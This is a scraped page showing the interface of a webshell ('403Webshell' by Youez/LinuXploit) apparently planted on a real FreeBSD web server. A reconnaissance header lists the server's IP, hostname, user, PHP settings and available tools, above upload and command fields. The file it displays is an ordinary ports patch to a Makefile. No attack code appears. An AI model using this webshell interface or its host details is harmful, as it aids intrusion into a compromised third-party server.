403Webshell
Server IP : 82.208.35.60  /  Your IP : 216.73.216.89
Web Server : Apache/2.4.55 (FreeBSD) OpenSSL/1.1.1q-freebsd PHP/7.3.31
System : FreeBSD server7.d2m.cz 12.4-RELEASE-p9 FreeBSD 12.4-RELEASE-p9 GENERIC amd64
User : studiokobylisy_cz ( 1008)
PHP Version : 7.3.31
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /usr/ports/math/parmgridgen/files/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /usr/ports/math/parmgridgen/files/patch-Makefile.in
--- Makefile.in.orig	2001-12-05 06:30:33.000000000 +0600
+++ Makefile.in	2010-12-15 09:45:04.000000000 +0600
@@ -9,17 +9,17 @@
 PARCC = cc
 
 # What optimization level to use
-OPTFLAGS = -O3
+OPTFLAGS = 
 
 # What options to be used by the compiler
-COPTIONS = 
+COPTIONS = ${PTHREAD_CFLAGS}
 
 # Which loader to use
 LD = cc
 PARLD = cc
 
 # What options to be used by the loader
-LDOPTIONS = -O3
+LDOPTIONS = 
 
 # Where to put the executable 
 BINDIR = ../..
@@ -29,18 +29,21 @@
 IMLIBDIR = ../../MGridGen/IMlib
 
 # Include directories for the compiler
-INCDIR = 
+INCDIR = -I${LOCALBASE}/include \
+	-I${LOCALBASE}/mpi/openmpi/include
 
 # In which directories to look for any additional libraries
 LIBDIR = -L../.. \
-         -L/usr/lib32/
+         -L/usr/lib/ \
+         -L/${LOCALBASE}/lib/ \
+         -L/${LOCALBASE}/mpi/openmpi/lib 
 
 # Set some flags
 DEBUGFLAGS =
 
 # What additional libraries to link the programs with (eg., -lmpi)
-LIBS = -lmgrid -lm
-PARLIBS = -lparmgrid -lmgrid -lmpi -lm
+LIBS = -lmgrid -lm -pthread
+PARLIBS = -lparmgrid -lmgrid -lmpi -lm -pthread
 
 
 # What archiving to use

Youez - 2016 - github.com/yon3zu
LinuXploit